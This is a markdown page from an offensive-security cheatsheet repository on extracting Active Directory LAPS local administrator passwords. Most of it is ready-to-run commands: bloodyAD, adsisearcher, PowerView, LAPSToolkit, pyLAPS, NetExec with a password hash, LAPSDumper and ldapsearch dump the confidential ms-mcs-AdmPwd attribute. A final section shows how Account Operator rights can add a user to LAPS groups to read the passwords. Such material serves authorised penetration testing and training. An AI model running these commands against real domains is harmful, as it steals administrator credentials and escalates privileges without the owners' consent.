daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

pwd-read-laps.md (4412B)


      1 ---
      2 title: "Password - LAPS"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/pwd-read-laps.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/pwd-read-laps.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Password - LAPS
     12 
     13 ## Reading LAPS Password
     14 
     15 > Use LAPS to automatically manage local administrator passwords on domain joined computers so that passwords are unique on each managed computer, randomly generated, and securely stored in Active Directory infrastructure.
     16 
     17 ### Determine if LAPS is installed
     18 
     19 ```ps1
     20 Get-ChildItem 'c:\program files\LAPS\CSE\Admpwd.dll'
     21 Get-FileHash 'c:\program files\LAPS\CSE\Admpwd.dll'
     22 Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll'
     23 ```
     24 
     25 ### Extract LAPS password
     26 
     27 > The "ms-mcs-AdmPwd" a "confidential" computer attribute that stores the clear-text LAPS password. Confidential attributes can only be viewed by Domain Admins by default, and unlike other attributes, is not accessible by Authenticated Users
     28 
     29 - Windows/Linux:
     30 
     31     ```ps1
     32     bloodyAD -u john.doe -d bloody.lab -p Password512 --host 192.168.10.2 get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
     33     ```
     34 
     35 - From Windows:
     36 
     37     - adsisearcher (native binary on Windows 8+)
     38 
     39        ```powershell
     40        ([adsisearcher]"(&(objectCategory=computer)(ms-MCS-AdmPwd=*)(sAMAccountName=*))").findAll() | ForEach-Object { $_.properties}
     41        ([adsisearcher]"(&(objectCategory=computer)(ms-MCS-AdmPwd=*)(sAMAccountName=MACHINE$))").findAll() | ForEach-Object { $_.properties}
     42        ```
     43 
     44     - [PowerTools/PowerView](https://github.com/PowerShellEmpire/PowerTools)
     45 
     46        ```powershell
     47        PS > Import-Module .\PowerView.ps1
     48        PS > Get-DomainComputer COMPUTER -Properties ms-mcs-AdmPwd,ComputerName,ms-mcs-AdmPwdExpirationTime
     49        ```
     50 
     51     - [leoloobeek/LAPSToolkit](https://github.com/leoloobeek/LAPSToolkit)
     52 
     53        ```powershell
     54        $ Get-LAPSComputers
     55        ComputerName                Password                                 Expiration         
     56        ------------                --------                                 ----------         
     57        example.domain.local        dbZu7;vGaI)Y6w1L                         02/21/2021 22:29:18
     58 
     59        $ Find-LAPSDelegatedGroups
     60        $ Find-AdmPwdExtendedRights
     61        ```
     62 
     63     - Powershell AdmPwd.PS
     64 
     65        ```powershell
     66        foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}}
     67        ```
     68 
     69 - From Linux:
     70 
     71     - [p0dalirius/pyLAPS](https://github.com/p0dalirius/pyLAPS) to **read** and **write** LAPS passwords:
     72 
     73        ```bash
     74        # Read the password of all computers
     75        ./pyLAPS.py --action get -u 'Administrator' -d 'LAB.local' -p 'Admin123!' --dc-ip 192.168.2.1
     76        # Write a random password to a specific computer
     77        ./pyLAPS.py --action set --computer 'PC01$' -u 'Administrator' -d 'LAB.local' -p 'Admin123!' --dc-ip 192.168.2.1
     78        ```
     79 
     80     - [Pennyw0rth/NetExec](https://github.com/Pennyw0rth/NetExec):
     81 
     82        ```bash
     83        netexec ldap 10.10.10.10 -u 'user' -H '8846f7eaee8fb117ad06bdd830b7586c' -M laps
     84        ```
     85 
     86     - [n00py/LAPSDumper](https://github.com/n00py/LAPSDumper)
     87 
     88        ```bash
     89        python laps.py -u 'user' -p 'password' -d 'domain.local'
     90        python laps.py -u 'user' -p 'e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c' -d 'domain.local' -l 'dc01.domain.local'
     91        ```
     92 
     93     - ldapsearch
     94 
     95       ```bash
     96       ldapsearch -x -h  -D "<bind user>" -w  -b "dc=<>,dc=<>,dc=<>" "(&(objectCategory=computer)(ms-MCS-AdmPwd=*))" ms-MCS-AdmPwd
     97       ```
     98 
     99 ### Grant LAPS Access
    100 
    101 The members of the group **"Account Operator"** can add and modify all the non admin users and groups. Since **LAPS ADM** and **LAPS READ** are considered as non admin groups, it's possible to add an user to them, and read the LAPS admin password
    102 
    103 ```ps1
    104 Add-DomainGroupMember -Identity 'LAPS ADM' -Members 'user1' -Credential $cred -Domain "domain.local"
    105 Add-DomainGroupMember -Identity 'LAPS READ' -Members 'user1' -Credential $cred -Domain "domain.local"
    106 ```
    107 
    108 ## References
    109 
    110 - [Training - Attacking and Defending Active Directory Lab - Altered Security](https://www.alteredsecurity.com/adlab)